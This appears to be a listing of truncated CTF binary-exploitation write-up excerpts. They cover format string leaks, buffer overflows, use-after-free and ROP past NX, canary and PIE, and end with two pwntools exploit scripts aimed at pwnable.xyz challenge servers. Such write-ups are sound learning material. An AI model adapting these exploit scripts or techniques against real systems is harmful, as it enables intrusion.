Pwning stuffs

We begin by looking at the protections of the binary. We have several problems and we can not execute code in the stack due to NX protection and we do not see the possibility of an overflow due to canary. We also have PIE activated and full relro so GOT dereferencing/overwriting will not be possible. We start with option 3 that will call the print_flag function. If we see inside the function we ..

We will start by looking at the protections of the binary and we realize that NX is enabled so it will not let us execute code in memory. First we see that our attack vector are two inputs but we do not know the iteration that the program returns to us. So we will have to open gdb and analyze the code in search of how to exploit it and perform the important task of reverse engineering. After see..

At first we realize that there is a format string vulnerability by which we can leak the memory addresses of the stack and thus bypassing ASLR. After a few attempts we see that in position %10$p we leak memory address of the stack and at minus 0x20 it would be the pointer of name whose test content we entered was "AAAA". The next step is to create our exploit that makes the leak using pwntools l..

Writeup - From Format String to Buffer OverflowPKTeam Recon First of all we see the protections of the binary. We have several problems. We can not execute code in the stack such as a shellcode due to NX, we can not overflow without having a canary leak and if we want to attach with gdb we have to bypass PIE as if we want to do ROP (Return-Oriented Programming). We also need leak of a function t..

Write-up - Use After FreePKTeam 1. Register. We start registering a user AAAA. 0x555555554ac3 lea rax, [rbp-0x60] 0x555555554ac7 lea rsi, [rip+0x695] # 0x555555555163 0x555555554ace mov rdi, rax 0x555555554ad1 call 0x5555555548b0 We see a comparison of our input in RAX register. This register contains a memory address of the stack that contains the AAAA input. In RSI register we have the string ..

Writeup - pwnable.kr Sabiendo que tenemos un overflow y la dirección de retorno en el stack, podríamos escribe en el buffer donde contiene los primeros 4 bytes del nombre que introducimos. Deberemos escaping primero en ese buffer cuando nos pregunta por cual es nuestro nombre, los opcodes de jmp rsp. Segundo aprovecharemos el overflow para escribir en la dirección de retorno justo la dirección d..

Exploit from pwn import * context.log_level = 'debug' p = remote("svc.pwnable.xyz",30031) #p = process('./two_targets') #gdb.attach(p,''' #break *0x00400bd1 #continue #''') payload = "Did_you_really_miss_the_"+"\xc8"+"T_b"+"\x7f"+"D"+"\x84"+"\xf3" p.recvuntil("> ") p.sendline("1") p.recvuntil("name: ") p.sendline(payload) p.recvuntil("> ") p.sendline("4") p.recvuntil("> ") p.interactive()

Exploit from pwn import * import time context.log_level = 'debug' p = remote("svc.pwnable.xyz",30016) #p = process('./note') #gdb.attach(p,''' #break *0x0000000000400a10 #continue #''') p.recvuntil("> ") p.sendline("1") p.recvuntil("Note len? ") p.sendline("38") p.recvuntil("note: ") payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x20\x12\x60\x00" p.sendline(payload) p.recvuntil("> ") p.sendline("2"..